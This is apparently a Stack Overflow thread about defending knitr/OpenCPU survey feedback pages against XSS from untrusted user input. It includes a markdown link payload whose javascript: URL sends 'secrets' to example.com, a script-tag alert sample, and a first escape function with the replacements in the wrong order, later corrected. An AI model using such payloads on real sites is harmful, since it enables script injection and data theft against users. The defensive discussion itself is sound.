2

I'm using openCPU and knitr to generate custom feedback after surveys. To this end, I basically let survey developers specify rmd files. In this use case, the survey developers are trusted, but the survey takers may not be.

I'm now thinking about XSS. It's not a big worry as user feedback will of course usually only be displayed to the user who entered the data on display, but of course characters like '<' will be used for non-malicious reasons and I'd like to think ahead and explore some of the trials and tribulations of freely mixing R with web apps.

Knitr and R generally were not made with untrusted users and XSS in my mind. OpenCPU rectifies many security issues with running AppArmored-R as an API, but I wonder whether a maximum-flexibility approach like mine can also be proofed.

Possible points at which one might separate trusted and untrusted markup:

  1. Before knitting, i.e. I pass escaped user data to the rmd-file. Drawback: An oblivious survey dev might unescape it accidentally or because it's annoying in some context.
  2. During knitting. This would be ideal, I guess, but I don't know if it's possible, especially if a survey dev could potentially alter chunk settings.
  3. After knitting. I think it's impossible to separate trusted and untrusted markup post-hoc.

Some code to paste into OpenCPU's knitr app:

```{r}
good_userdata = 'I like brackets [].'
bad_userdata = 'some text should not be 
[linked](javascript:location.href=\'http://example.com?secrets\';), <s>struck</s> or __bold__'

escape_html = highr:::escape_html
escape_md <- function(x){
  x <- gsub('\\[', '\\\\[', x);
  x <- gsub('_', '\\\\_', x);
  x
} 
good_userdata_escaped = escape_md(escape_html(good_userdata))
bad_userdata_escaped = escape_md(escape_html(bad_userdata))
```

## let's say survey devs wants to print text like this
```{r}
cat(good_userdata_escaped)
cat(bad_userdata_escaped) # doesn't know about text like this
```

## gets annoyed, does
```{r}
good_userdata_escaped <- gsub('\\\\', '', good_userdata_escaped);
bad_userdata_escaped <- gsub('\\\\', '', bad_userdata_escaped);
```

##
so that this looks nice
```{r}
cat(good_userdata_escaped)
```

## later renders the same text inline, so that is evaluated as markdown

`r good_userdata_escaped # doesn't look dangerous`

`r bad_userdata_escaped`

Edit 2

Sorry, I had provided only some HTML tags, thinking possible XSS attacks were obvious. Michel Fortin had some examples on his page.

Ruben
  • 3,452
  • 31
  • 47

1 Answers1

1

I'm not 100% sure I understand your concern. If you're worried about XSS, you're worried about users including a javascript tag or so in the markdown right?

```{r}
userdata = '<script>alert("I am evil")</script>'
```

```{r,results='asis'}
cat(userdata)
```

You can prevent this by escaping html characters. I think there's a section on this in the markdown definition. So you would need to escape all user input, either when inserting it in your DB or when extracting it:

escape <- function(x){
  x <- gsub("<", "&lt;", x);
  x <- gsub(">", "&gt;", x);
  x <- gsub("&", "&amp;", x);
  x
} 

Try running the following:

```{r output}
escape <- function(x){
  x <- gsub("&", "&amp;", x);
  x <- gsub("<", "&lt;", x);
  x <- gsub(">", "&gt;", x);
  x
} 
```

```{r}
userdata = escape('<script>alert("I am evil")</script>')
```

```{r,results='asis'}
cat(userdata)
```

That should take care of any code injection. I'm not quite sure how the __bold__ example is a concern, because afaics this can not be used for an XSS attack as there is no scripting. But if you want to prevent users from messing with layout too, than you should escape all markdown characters I guess.

Jeroen Ooms
  • 31,998
  • 35
  • 134
  • 207
  • Thanks. Well, I'm thinking about scripting, but also accidental formatting changes (modified the question a little). I thought, if I escape the user data upon retrieval from the DB, then an oblivious survey developer might somehow end up annoyed with backslashed markdown characters, they might attempt to remove them and then again open the door for XSS. A bit contrived, I know, but that's why I'm asking whether there's a way to basically disallow 'asis' printing of HTML and markdown, so that all HTML/Markdown that is not outside a code chunk gets escaped. It might be more of a `knitr` question – Ruben Nov 06 '13 at 17:00